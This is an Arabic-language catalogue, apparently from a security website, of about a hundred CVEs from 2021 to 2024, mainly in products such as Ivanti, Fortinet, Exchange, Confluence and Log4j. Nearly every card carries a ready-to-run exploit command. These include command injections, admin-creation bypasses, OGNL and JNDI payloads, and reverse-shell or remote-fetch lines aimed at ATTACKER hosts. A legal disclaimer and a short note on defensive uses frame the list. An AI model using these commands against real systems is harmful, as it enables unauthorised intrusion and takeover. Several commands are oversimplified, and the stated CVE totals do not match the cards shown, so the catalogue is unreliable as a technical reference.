العمليات والتقصيخبير180mL27

دليل أهم 100 ثغرة CVE حديثة

شرح معمق لأخطر الثغرات الحديثة وكيفية استغلالها

#CVE#Exploits#PoC#KEV

تحذير قانوني

هذه الأوامر للأغراض التعليمية و البحث الدفاعي فقط (lab الخاص أو CTF أو ضمن نطاق pentest مرخّص). استخدامها على أنظمة لا تملك إذناً صريحاً بمهاجمتها جريمة معاقب عليها.

نظرة عامة

هذا الكتالوج يجمع أهم 101 ثغرة CVE من السنوات الأخيرة، أغلبها في قائمة CISA KEV (مستغلة في البرية). كل بطاقة تحتوي على: المعرّف، شدة الخطر، المنتج، شرح آلية الثغرة، و أمر تنفيذ توضيحي (PoC). الترتيب من الأحدث إلى الأقدم.

CRITICAL — 50
HIGH — 50
السنوات المغطاة: 2021–2024

2024 — 39 CVEs

CVE-2024-3400CRITICAL · CVSS 10.0Palo Alto GlobalProtect2024

حقن أوامر في GlobalProtect VPN

تمرير قيمة شل في كوكي SESSID يؤدي لتنفيذ كود بصلاحية root بدون مصادقة.

$ curl -k 'https://VPN/ssl-vpn/hipreport.esp' -H "Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/css/`id`"

CVE-2024-21887CRITICAL · CVSS 9.1Ivanti Connect Secure2024

حقن أوامر في Ivanti Connect Secure

نقطة /api/v1/license/keys-status/ تمرر مدخلاً غير معقم لـ shell. تُربط مع 2023-46805 لتجاوز المصادقة.

$ curl -k 'https://TARGET/api/v1/totp/user-backup-code/../../license/keys-status/;id;'

CVE-2024-1709CRITICAL · CVSS 10.0ConnectWise ScreenConnect2024

تجاوز مصادقة في ScreenConnect

إرسال طلب POST إلى SetupWizard.aspx بعد الإعداد ينشئ مستخدم admin جديد.

$ curl -k 'https://TARGET/SetupWizard.aspx/x' -d 'Email=a@a.a&Password=Pwn123!&UserName=pwn&CompanyInformation.Name=x'

CVE-2024-23897CRITICAL · CVSS 9.8Jenkins2024

قراءة ملفات تعسفية في Jenkins CLI

args4j يفك الوسائط التي تبدأ بـ '@' كملفات → قراءة /etc/passwd أو secrets.

$ java -jar jenkins-cli.jar -s https://TARGET/ connect-node "@/etc/passwd"

CVE-2024-27198CRITICAL · CVSS 9.8JetBrains TeamCity2024

تجاوز مصادقة في TeamCity

إضافة ?jsp=/login.jsp;.jsp إلى أي endpoint يتجاوز فحص المصادقة → إنشاء admin token.

$ curl -X POST 'https://TARGET/hax?jsp=/app/rest/users;.jsp' -H 'Content-Type: application/json' -d '{"username":"pwn","password":"Pwn123!","email":"x@x","roles":{"role":[{"roleId":"SYSTEM_ADMIN","scope":"g"}]}}'

CVE-2024-4577CRITICAL · CVSS 9.8PHP-CGI on Windows2024

حقن وسائط PHP-CGI

تحويل أحرف Unicode soft-hyphen إلى '-' يسمح بتمرير '-d allow_url_include=1' وتنفيذ كود.

$ curl 'http://TARGET/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input' --data '<?php system($_GET[0]);?>&0=id'

CVE-2024-6387HIGH · CVSS 8.1OpenSSH (regreSSHion)2024

RCE في OpenSSH (regreSSHion)

حالة سباق في معالج SIGALRM يسمح بتنفيذ كود قبل المصادقة على Linux glibc.

# PoC requires thousands of attempts. Use public PoC:

$ python3 regreSSHion.py -t TARGET -p 22

CVE-2024-47176CRITICAL · CVSS 9.1CUPS cups-browsed2024

RCE في CUPS عبر IPP

إرسال حزمة UDP/631 تجبر النظام على تثبيت طابعة خبيثة → تنفيذ FoomaticRIPCommandLine.

$ echo -n '0 3 http://ATTACKER:8631/printers/x' | nc -u TARGET 631

CVE-2024-38063CRITICAL · CVSS 9.8Windows TCP/IP IPv62024

RCE قبل المصادقة عبر IPv6

حزم IPv6 مصاغة تسبب تلف ذاكرة في tcpip.sys → تنفيذ كود في kernel.

# Send oversized fragmented IPv6 packets:

$ python3 ipv6_rce.py --target TARGET --frags 100

CVE-2024-38077CRITICAL · CVSS 9.8Windows Remote Desktop Licensing (MadLicense)2024

تكدس heap في خدمة ترخيص RDS

حزمة 'license blob' كبيرة في CDataCoding::GetEncodedSize تسبب overflow → RCE.

$ python3 madlicense_poc.py TARGET 3389

CVE-2024-21412HIGH · CVSS 8.1Windows SmartScreen2024

تجاوز SmartScreen عبر LNK→URL

إنشاء .url أو .lnk يشير لـ SMB ينفذ بدون تحذير MoTW.

# Craft .url: URL=file://ATTACKER/share/payload.exe → no SmartScreen prompt.

CVE-2024-30088HIGH · CVSS 7.0Windows Kernel2024

TOCTOU في NtQueryInformation*Token

حالة سباق بين فحص المؤشر و استخدامه → كتابة kernel و SYSTEM.

# Public PoC: AppContainer-LPE.exe → opens cmd as SYSTEM

CVE-2024-21762CRITICAL · CVSS 9.6Fortinet FortiOS SSL-VPN2024

كتابة خارج الذاكرة في sslvpnd

طلب HTTP بحجم Content-Length غير صحيح يكتب خارج المخزن → RCE.

$ curl -k 'https://TARGET/remote/login' -H 'Content-Length: 999999999' --data-binary @payload.bin

CVE-2024-21893HIGH · CVSS 8.2Ivanti Connect Secure SSRF2024

SSRF في SAML component

استغلال SAML يسمح بطلبات داخلية و الوصول لخدمات localhost.

$ curl -k 'https://TARGET/dana-ws/saml20.ws' --data '<xxe>http://127.0.0.1:8090/secret</xxe>'

CVE-2024-20356HIGH · CVSS 8.7Cisco IMC2024

حقن أوامر في Cisco IMC

Web UI يمرر مدخلات لـ shell → RCE بصلاحية root.

$ curl -k -u admin:admin 'https://TARGET/data?op=do&id=$(id)'

CVE-2024-20253CRITICAL · CVSS 9.9Cisco Unified Comms2024

تنفيذ كود في Cisco CCX/CUCM

كائن Java مُسلسل خبيث يصل عبر منفذ مفتوح ينفذ كود.

$ ysoserial CommonsCollections5 'curl ATTACKER/sh|bash' | nc TARGET 8080

CVE-2024-22024HIGH · CVSS 8.3Ivanti2024

XXE في Ivanti

كيان XML خارجي يقرأ ملفات النظام عبر SAML endpoint.

$ curl -k 'https://TARGET/dana-ws/saml20.ws' --data @xxe.xml

CVE-2024-7593CRITICAL · CVSS 9.8Ivanti vTM2024

تجاوز مصادقة لوحة Ivanti vTM

خوارزمية المقارنة الزمنية تسمح بإنشاء admin بدون كلمة مرور.

$ curl -k 'https://TARGET:9090/apps/zxtm/index.fcgi?section=Users' -X POST -d 'create=pwn&password=Pwn1!'

CVE-2024-28995HIGH · CVSS 8.6SolarWinds Serv-U2024

Path traversal في Serv-U

تمرير ../ في معامل InternalDir يقرأ أي ملف.

$ curl 'https://TARGET/?InternalDir=\..\..\..\..\windows\win.ini&InternalFile=win.ini'

CVE-2024-29849CRITICAL · CVSS 9.8Veeam Backup Enterprise Manager2024

تجاوز مصادقة في Veeam BEM

خطأ في فحص الـ JWT يسمح للمهاجم بالدخول كـ admin.

# Forge JWT with empty signature → POST /api/sessionMngr/?v=latest

CVE-2024-37085HIGH · CVSS 7.2VMware ESXi2024

تجاوز مصادقة AD في ESXi

إنشاء مجموعة 'ESX Admins' في AD يمنح صلاحية كاملة على ESXi.

$ net group "ESX Admins" /domain /add && net group "ESX Admins" pwnuser /add /domain

CVE-2024-38112HIGH · CVSS 7.5Windows MSHTML2024

Spoofing في MSHTML

ملف .url يفتح IE في وضع mhtml بحمولة CHM → تنفيذ كود.

# .url file: URL=mhtml:http://ATTACKER/page.html!cid:script.htm

CVE-2024-7971HIGH · CVSS 8.8Chrome V82024

Type confusion في V8

خلل في مُحسِّن JIT يسمح بتنفيذ كود في sandbox renderer.

# Visit malicious page hosting V8 PoC → renderer RCE

CVE-2024-43461HIGH · CVSS 8.8Windows MSHTML2024

MSHTML platform spoofing #2

ملف ZIP داخل .url يخفي امتداد .hta عبر أحرف RLO.

# Craft .url with U+202E to hide .hta extension

CVE-2024-38178HIGH · CVSS 7.5Windows Scripting Engine2024

RCE في Scripting Engine

JScript9 type confusion في وضع IE.

# Host page with JScript9 PoC opened via Edge IE-mode

CVE-2024-38193HIGH · CVSS 7.8Windows AFD.sys2024

EoP في AFD.sys

Use-after-free في WSK يمنح SYSTEM. مستغلة في البرية (Lazarus).

$ afd_lpe.exe

CVE-2024-49039HIGH · CVSS 8.8Windows Task Scheduler2024

EoP في Task Scheduler

RPC غير محمي يسمح بتشغيل مهام بصلاحية أعلى.

$ task_sched_lpe.exe

CVE-2024-43451MEDIUM · CVSS 6.5Windows MSHTML NTLM2024

تسريب hash NTLM

ملف .url يجبر اتصال SMB لمصدر تحكم المهاجم → التقاط NTLMv2.

# .url: IconFile=\\ATTACKER\share\icon.ico

CVE-2024-49138HIGH · CVSS 7.8Windows CLFS2024

EoP في CLFS

تلف heap في معالجة BLF يمنح SYSTEM.

$ clfs_exploit.exe

CVE-2024-50623CRITICAL · CVSS 9.8Cleo LexiCom/Harmony2024

Unrestricted file upload في Cleo

رفع JSP إلى /webclient ينفذ → RCE استخدمه Cl0p.

$ curl -X POST 'http://TARGET:5080/api/Incoming?host=x&port=8080' --data-binary @payload.jsp

CVE-2024-55956CRITICAL · CVSS 9.8Cleo Harmony patch bypass2024

تجاوز ترقيع Cleo

نفس مفهوم 50623 مع مسار جديد لم تُغطّه الترقيعة.

$ curl -X POST 'http://TARGET:5080/Synchronization?host=x' --data-binary @payload.jsp

CVE-2024-9474HIGH · CVSS 7.2Palo Alto PAN-OS2024

EoP في PAN-OS web

حقن أمر في pseudo-shell يرفع لصلاحية root.

$ curl -k -u admin:admin 'https://TARGET/php/utils/router.php/PanDirect/run/$(id)'

CVE-2024-0012CRITICAL · CVSS 9.3Palo Alto PAN-OS2024

تجاوز مصادقة لوحة PAN-OS

نقطة management بدون مصادقة عبر nginx misconfig → ربط مع 9474 = RCE root.

$ curl -k 'https://TARGET/php/utils/router.php' -H 'X-PAN-AUTHCHECK: off'

CVE-2024-29847CRITICAL · CVSS 10.0Ivanti EPM2024

Deserialization في Ivanti EPM

AgentPortal يقبل كائن .NET مُسلسل خبيث → RCE.

$ ysoserial.net -g TypeConfuseDelegate -f BinaryFormatter -c "cmd /c calc" | curl --data-binary @- http://TARGET:8082/AgentPortal

CVE-2024-7262HIGH · CVSS 9.3Kingsoft WPS Office2024

Path traversal في WPS Office

ملف وثيقة بـ promecefpluginhost يحمل DLL خارجي.

# Craft .docx that calls ksoqing://... promecefpluginhost path

CVE-2024-32896HIGH · CVSS 7.8Pixel firmware2024

EoP في Pixel firmware

خلل في bootloader يمنح صلاحيات أعلى. مستغلة محلياً.

# physical access; staged via fastboot

CVE-2024-53104HIGH · CVSS 7.8Linux Kernel UVC2024

OOB write في uvcvideo

إطار UVC مزور يكتب خارج المخزن → ارتقاء صلاحيات.

# requires malicious USB device or vuln video stream

CVE-2024-50302HIGH · CVSS 7.8Linux Kernel HID2024

تسريب ذاكرة في HID core

تهيئة جهاز HID يقرأ ذاكرة kernel غير مهيأة.

# requires HID device control (USB/Bluetooth)

CVE-2024-38080HIGH · CVSS 7.8Windows Hyper-V2024

EoP في Hyper-V

خلل integer overflow يسمح بالقفز من guest إلى SYSTEM في host.

$ hyperv_lpe.exe

2023 — 31 CVEs

CVE-2023-46805HIGH · CVSS 8.2Ivanti Connect Secure2023

تجاوز مصادقة في Ivanti

استخدام مسار web API بدون مصادقة عبر path traversal '/../../'.

$ curl -k 'https://TARGET/api/v1/totp/user-backup-code/../../system/system-information'

CVE-2023-2868CRITICAL · CVSS 9.8Barracuda ESG2023

RCE في Barracuda ESG

ملف TAR مرفق في إيميل يحوي اسم ملف بمحارف shell ينفذ → RCE.

$ tar cf evil.tar "$(printf 'a;ncat ATTACKER 4444 -e /bin/sh;.txt')"

CVE-2023-3519CRITICAL · CVSS 9.8Citrix NetScaler ADC2023

RCE قبل المصادقة في NetScaler

Stack overflow في معالجة SAML SP يسمح بتنفيذ كود.

$ curl -k 'https://TARGET/cgi/samlauth' -d @oversized_saml.xml

CVE-2023-4966CRITICAL · CVSS 9.4Citrix NetScaler (Citrix Bleed)2023

تسريب جلسة Citrix Bleed

حزمة OpenID مع HTTP/1 oversized تكشف ذاكرة → استرجاع session token.

$ curl -k 'https://TARGET/oauth/idp/.well-known/openid-configuration' -H "Host: $(python -c 'print("a"*24576)')"

CVE-2023-22515CRITICAL · CVSS 10.0Atlassian Confluence2023

إنشاء admin في Confluence

نقطة /setup تظل مفتوحة في الإصدارات المتأثرة → إنشاء حساب admin.

$ curl 'http://TARGET:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false'

$ curl 'http://TARGET:8090/setup/setupadministrator.action' -d 'username=pwn&password=Pwn1!&fullName=x&email=x@x'

CVE-2023-22518CRITICAL · CVSS 9.1Confluence2023

Improper auth في Confluence DR

نقطة استعادة النسخ الاحتياطي بدون مصادقة → DoS و إعادة كتابة.

$ curl -X POST 'http://TARGET/json/setup-restore.action?synchronous=true' -F 'file=@evil.zip'

CVE-2023-34362CRITICAL · CVSS 9.8Progress MOVEit Transfer2023

SQLi في MOVEit (Cl0p)

حقن SQL في معالج SilHTM ثم تثبيت webshell human2.aspx.

$ curl -k 'https://TARGET/moveitisapi/moveitisapi.dll?action=m2&User=...UNION...'

CVE-2023-35078CRITICAL · CVSS 10.0Ivanti EPMM2023

تجاوز مصادقة Ivanti EPMM

تخطي فحص ACL باستخدام مسار /api/v2/ يكشف API الإدارية.

$ curl 'https://TARGET/mifs/aad/api/v2/ping?'

CVE-2023-35081HIGH · CVSS 7.8Ivanti EPMM2023

Path traversal في EPMM

كتابة ملفات تعسفية في mifs → ربط مع 35078 لرفع webshell.

$ curl -k -X PUT 'https://TARGET/mifs/admin/rest/api/v2/files/../../../webapps/mifs/shell.jsp' --data-binary @shell.jsp

CVE-2023-36884HIGH · CVSS 8.3Office/HTML (Storm-0978)2023

Office RCE عبر HTML

وثيقة Word تربط بـ RTF/HTML ينفذ كود عند الفتح.

# Word doc with embedded URL to attacker .rtf running pe

CVE-2023-23397CRITICAL · CVSS 9.8Outlook NTLM2023

تسريب NTLM في Outlook

موعد تقويم بـ PidLidReminderFileParameter UNC يجبر Outlook على المصادقة لـ SMB المهاجم.

# .msg with PidLidReminderFileParameter=\\ATTACKER\share\a.wav

CVE-2023-21768HIGH · CVSS 7.8Windows ALPC2023

EoP في afd.sys ALPC

Write-What-Where في معالج IOCTL يكتب على token.

$ afd_alpc_lpe.exe

CVE-2023-28252HIGH · CVSS 7.8Windows CLFS2023

CLFS EoP (Nokoyawa)

تلاعب بحقل في BLF يكتب bit في kernel struct → SYSTEM.

$ clfs28252.exe

CVE-2023-29336HIGH · CVSS 7.8Windows Win32k2023

Win32k EoP

Type confusion في NtUserCreateInputContext → SYSTEM.

$ win32k_29336.exe

CVE-2023-36874HIGH · CVSS 7.8Windows Error Reporting2023

EoP في WER

إنشاء mountpoint يخدع WER لتشغيل ملف بصلاحية SYSTEM.

# Public WER LPE PoC drops cmd.exe as SYSTEM

CVE-2023-38831HIGH · CVSS 7.8WinRAR2023

خطأ ZIP في WinRAR (RomCom)

ZIP يحوي مجلد بنفس اسم ملف ينفذ skript عند فتح PDF.

# Build ZIP with: doc.pdf and doc.pdf/ folder containing doc.pdf .cmd

CVE-2023-46604CRITICAL · CVSS 10.0Apache ActiveMQ2023

RCE في OpenWire

تمرير ClassPathXmlApplicationContext في رسالة OpenWire ينفذ XML من URL.

$ python3 ActiveMQ_RCE.py -t TARGET -p 61616 -u http://ATTACKER/payload.xml

CVE-2023-50164CRITICAL · CVSS 9.8Apache Struts22023

Path traversal في رفع ملفات Struts2

تلاعب بـ fileName parameter يكتب ملف خارج المسار → JSP webshell.

$ curl -F 'upload=@shell.jsp' -F 'uploadFileName=../../shell.jsp' http://TARGET/upload.action

CVE-2023-22527CRITICAL · CVSS 10.0Confluence2023

SSTI في Confluence

حقن OGNL في قالب text-inline.vm → RCE قبل المصادقة.

$ curl 'http://TARGET/template/aui/text-inline.vm' --data 'label=\u0027%2b#request.get(\u0022.KEY_velocity.struts2.context\u0022).internalGet(\u0022ognl\u0022).findValue(\u0022@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({\u0022id\u0022}))\u0022,{})'

CVE-2023-49103CRITICAL · CVSS 10.0ownCloud graphapi2023

تسريب أسرار graphapi

نقطة phpinfo داخل graphapi تكشف متغيرات بيئة (OC creds, API keys).

$ curl 'http://TARGET/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css'

CVE-2023-42793CRITICAL · CVSS 9.8JetBrains TeamCity2023

تجاوز مصادقة TeamCity (قديم)

نقطة /app/rest/users/id:1/tokens تنشأ token admin بدون مصادقة.

$ curl -X POST 'http://TARGET:8111/app/rest/users/id:1/tokens/pwn'

CVE-2023-20198CRITICAL · CVSS 10.0Cisco IOS XE Web UI2023

إنشاء privilege 15 على IOS XE

نقطة web service POST تنشئ مستخدم محلي بدون مصادقة.

$ curl -k 'https://TARGET/webui/logoutconfirm.html?logon_hash=1' && curl -k -X POST 'https://TARGET/%25%32%66webui%25%32%66' -d 'create=pwn&priv=15'

CVE-2023-27997CRITICAL · CVSS 9.8Fortinet SSL VPN2023

Heap overflow في FortiOS SSL VPN

حقل cookie بحجم خاطئ يسبب heap overflow → RCE.

$ python3 fortios_27997.py -t TARGET -p 443

CVE-2023-35628CRITICAL · CVSS 8.1Windows MSHTML2023

MSHTML RCE عبر إيميل

إيميل HTML يفعل URL handler قبل العرض → RCE preview.

# email with crafted ms-search:// URL

CVE-2023-23752HIGH · CVSS 5.3Joomla2023

Improper access في Joomla API

نقطة /api/index.php/v1/config/application?public=true تكشف معلومات DB.

$ curl 'http://TARGET/api/index.php/v1/config/application?public=true'

CVE-2023-3079HIGH · CVSS 8.8Chrome V82023

Type confusion في V8

خطأ تحسين JIT يسمح بتنفيذ shellcode في renderer.

# Visit malicious page

CVE-2023-32434HIGH · CVSS 8.8iOS kernel2023

Integer overflow في iOS kernel

Triangulation chain — تنفيذ kernel بصلاحية root.

# zero-click iMessage

CVE-2023-41064HIGH · CVSS 8.8iOS ImageIO (BLASTPASS)2023

BLASTPASS — صورة WebP

صورة WebP في PassKit تستغل libwebp → كود قبل أي تفاعل.

# iMessage attachment with PassKit pass containing WebP

CVE-2023-41061HIGH · CVSS 7.8iOS Wallet2023

Validation issue في Wallet

Pass خبيث يثبت → زرع spyware (Pegasus chain).

# delivered as Wallet pass

CVE-2023-7024HIGH · CVSS 8.8Chrome WebRTC2023

Heap overflow في WebRTC

حزمة وسائط مزورة تسبب overflow في renderer.

# Visit malicious WebRTC page

CVE-2023-38545HIGH · CVSS 7.5curl SOCKS52023

Heap overflow في curl SOCKS5

اسم مضيف طويل في mode hostname-resolution يفيض في heap.

$ curl --socks5-hostname proxy:1080 "http://$(python -c 'print("A"*65535)')"

2022 — 11 CVEs

CVE-2022-22965CRITICAL · CVSS 9.8Spring Framework (Spring4Shell)2022

Spring4Shell — RCE في DataBinder

ربط حقول class.module.classLoader على JDK 9+ يكتب JSP webshell.

$ curl 'http://TARGET/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di+if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B+java.io.InputStream+in+%3D+%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B+...&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='

CVE-2022-30190HIGH · CVSS 7.8MS Office MSDT (Follina)2022

Follina — تنفيذ MSDT

وثيقة Word تستدعي ms-msdt:/ مع PowerShell → RCE بدون macros.

# Word doc with external link to ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(...calc...).odt"

CVE-2022-26134CRITICAL · CVSS 9.8Atlassian Confluence2022

OGNL injection في Confluence

حقن OGNL في URI path → RCE قبل المصادقة.

$ curl 'http://TARGET/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Out%22%2C%23a%29%29%7D/'

CVE-2022-1388CRITICAL · CVSS 9.8F5 BIG-IP iControl REST2022

تجاوز مصادقة iControl REST

تهيئة Connection: X-F5-Auth-Token تتجاوز مصادقة iControl.

$ curl -sku admin: 'https://TARGET/mgmt/tm/util/bash' -H 'Connection: keep-alive, X-F5-Auth-Token' -H 'X-F5-Auth-Token:' -d '{"command":"run","utilCmdArgs":"-c id"}'

CVE-2022-41040HIGH · CVSS 8.8MS Exchange (ProxyNotShell SSRF)2022

SSRF في Exchange (ProxyNotShell)

تجاوز autodiscover يصل لـ PowerShell remoting → ربط مع 41082.

$ curl -k 'https://TARGET/autodiscover/autodiscover.json?@evil.com/owa/?&Email=autodiscover/autodiscover.json%3F@evil.com'

CVE-2022-41082HIGH · CVSS 8.8MS Exchange (ProxyNotShell RCE)2022

RCE PowerShell في Exchange

PowerShell remoting deserialization → تنفيذ كود بصلاحية SYSTEM.

# Use ProxyNotShell.py public exploit pointing PSRemoting at attacker payload

CVE-2022-42475CRITICAL · CVSS 9.8FortiOS SSL-VPN2022

Heap overflow في FortiOS sslvpnd

POST بحجم Content-Length مزور يسبب overflow → RCE.

$ python3 fortios_42475.py -t TARGET

CVE-2022-47966CRITICAL · CVSS 9.8Zoho ManageEngine SAML2022

RCE في ManageEngine عبر SAML

مكتبة xmlsec قديمة تسمح بتمرير SAML response مزور → تنفيذ كود.

# Generate forged SAML with public PoC, POST /SamlResponseServlet

CVE-2022-26925HIGH · CVSS 8.1Windows LSARPC (PetitPotam)2022

PetitPotam — إجبار NTLM

EFSRPC يجبر DC على المصادقة لـ host المهاجم → ربط مع AD CS = DA.

$ python3 PetitPotam.py ATTACKER_IP DC_IP

CVE-2022-21999HIGH · CVSS 7.8Windows Print Spooler (SpoolFool)2022

SpoolFool — EoP في Spooler

SetPrinterDataEx + reload driver path يكتب DLL في System32 → SYSTEM.

$ SpoolFool.exe -dll C:\windows\ emp\evil.dll

CVE-2022-37969HIGH · CVSS 7.8Windows CLFS2022

CLFS EoP

تلف heap في CLFS log → SYSTEM (نمط متكرر).

$ clfs37969.exe

2021 — 20 CVEs

CVE-2021-44228CRITICAL · CVSS 10.0Apache Log4j (Log4Shell)2021

Log4Shell — JNDI injection

تسجيل سلسلة ${jndi:ldap://...} يحمل class من LDAP المهاجم → RCE.

$ curl 'http://TARGET' -H 'User-Agent: ${jndi:ldap://ATTACKER:1389/a}'

# Serve via marshalsec ldap server pointing to malicious class

CVE-2021-45046CRITICAL · CVSS 9.0Log4j (patch bypass)2021

تجاوز ترقيع Log4j

ThreadContext lookup يسمح بـ JNDI رغم ترقيعة 2.15.

$ curl 'http://TARGET' -H 'X-Api-Version: ${jndi:ldap://ATTACKER/a}'

CVE-2021-26855CRITICAL · CVSS 9.8MS Exchange (ProxyLogon SSRF)2021

ProxyLogon — SSRF Exchange

كوكي مزور X-AnonResource-Backend يوجه طلباً مصادقاً لـ /ecp.

$ curl -k 'https://TARGET/owa/auth/x.js' -H 'Cookie: X-AnonResource=true; X-AnonResource-Backend=TARGET/ecp/default.flt?~3'

CVE-2021-34473CRITICAL · CVSS 9.8MS Exchange (ProxyShell)2021

ProxyShell — SSRF Exchange

نقطة autodiscover تتجاوز فحص URL → ربط مع 34523/31207 = RCE.

$ curl -k 'https://TARGET/autodiscover/autodiscover.json?@evil.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.com'

CVE-2021-34527CRITICAL · CVSS 8.8Windows Print Spooler (PrintNightmare)2021

PrintNightmare — RCE Spooler

RpcAddPrinterDriver يحمل DLL خبيث من SMB share → SYSTEM.

$ python3 CVE-2021-1675.py 'DOMAIN/USER:PASS@DC' '\\\\ATTACKER\\share\\evil.dll'

CVE-2021-1675HIGH · CVSS 7.8Print Spooler (PrintNightmare LPE)2021

PrintNightmare LPE

نفس مفهوم 34527 لكن محلياً → SYSTEM.

$ PrintNightmare.exe

CVE-2021-40444HIGH · CVSS 8.8MSHTML (Office)2021

MSHTML RCE في Office

وثيقة Word تحمل ActiveX cab خبيث → تنفيذ inf.

# Public 40444.py builds cab + .docx

CVE-2021-22005CRITICAL · CVSS 9.8VMware vCenter Server2021

Arbitrary file upload في vCenter

Endpoint /analytics/telemetry/ph/api/hyper/send يكتب JSP في tomcat.

$ curl -k 'https://TARGET/analytics/telemetry/ph/api/hyper/send?_c=&_i=' -H 'Content-Type: application/json' --data-binary @shell.jsp

CVE-2021-41773CRITICAL · CVSS 9.8Apache HTTPD2021

Path traversal في Apache 2.4.49

تشفير %2e%2e يتجاوز فحص المسار → قراءة و RCE إذا cgi-bin موجود.

$ curl --data 'echo;id' 'http://TARGET/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'

CVE-2021-26084CRITICAL · CVSS 9.8Confluence2021

OGNL injection في Confluence

حقل queryString في صفحة /pages/createpage-entervariables.action يقبل OGNL.

$ curl 'http://TARGET/pages/doenterpagevariables.action' -d 'queryString=aaa\u0027%2b{Class.forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022exec\u0022,...)}.%2b\u0027'

CVE-2021-21972CRITICAL · CVSS 9.8VMware vCenter vROps2021

RCE في vROps plugin

نقطة /ui/vropspluginui/rest/services/uploadova تقبل tar غير مصادق → JSP shell.

$ curl -k -X POST 'https://TARGET/ui/vropspluginui/rest/services/uploadova' -F uploadFile=@shell.tar

CVE-2021-31207HIGH · CVSS 7.2Exchange (ProxyShell)2021

Exchange writeable ECP

كتابة شل ASPX عبر New-MailboxExportRequest.

# After ProxyShell SSRF: New-MailboxExportRequest -FilePath \\TARGET\C$\inetpub\wwwroot\aspnet_client\sh.aspx

CVE-2021-26858HIGH · CVSS 7.8Exchange (ProxyLogon RCE)2021

ProxyLogon RCE chain

بعد SSRF يكتب OAB ملف ASPX → RCE.

# Chained after 26855 SSRF

CVE-2021-42321HIGH · CVSS 8.8Exchange2021

Exchange post-auth RCE

Deserialization في cmdlet validation → SYSTEM.

# Exchange-CVE-2021-42321 PoC requires user creds

CVE-2021-3156HIGH · CVSS 7.8sudo (Baron Samedit)2021

Baron Samedit — heap overflow في sudo

خط backslash مفرد في 'sudoedit -s' يفيض في heap → root.

$ gcc -o exploit baronsamedit.c && ./exploit

CVE-2021-4034HIGH · CVSS 7.8polkit pkexec (PwnKit)2021

PwnKit — pkexec LPE

argv فارغ + متغير بيئة GCONV_PATH يحمل shared object → root.

$ gcc -o pwnkit cve-2021-4034.c && ./pwnkit

CVE-2021-22986CRITICAL · CVSS 9.8F5 BIG-IP iControl REST2021

iControl REST RCE

نقطة bash / mgmt/tm/util/bash بدون مصادقة → RCE root.

$ curl -ku admin: 'https://TARGET/mgmt/tm/util/bash' -d '{"command":"run","utilCmdArgs":"-c id"}'

CVE-2021-20023HIGH · CVSS 6.5SonicWall Email Security2021

Path traversal في SonicWall ES

نقطة admin تقرأ ملفات تعسفية.

$ curl -k 'https://TARGET/admin/some.action?file=../../../../etc/passwd'

CVE-2021-44515CRITICAL · CVSS 9.8Zoho ManageEngine ServiceDesk2021

تجاوز مصادقة في ServiceDesk

REST API بدون فحص جلسة → كتابة JSP.

$ curl 'http://TARGET:8080/RestAPI/ImportTechnicians' -F file=@shell.jsp

CVE-2021-22941CRITICAL · CVSS 9.8Citrix ShareFile2021

Improper access في ShareFile

نقطة storage zone controller تكتب ملفات بدون مصادقة.

$ curl -k 'https://TARGET/upload?nodeid=...' --data-binary @shell.aspx

كيف تستخدم هذا الكتالوج

للدفاع: ابحث في بيئتك عن المنتجات المتأثرة و طبّق الترقيعات الرسمية فوراً.
للكشف: استخدم نمط الاستغلال أعلاه لكتابة قواعد Suricata / Sigma / Yara.
للهجوم المرخّص: لا تنفّذ أي أمر إلا داخل نطاق محدد بإذن خطي.

صندوق الأدوات الشامل

دليل الاستغلال السريع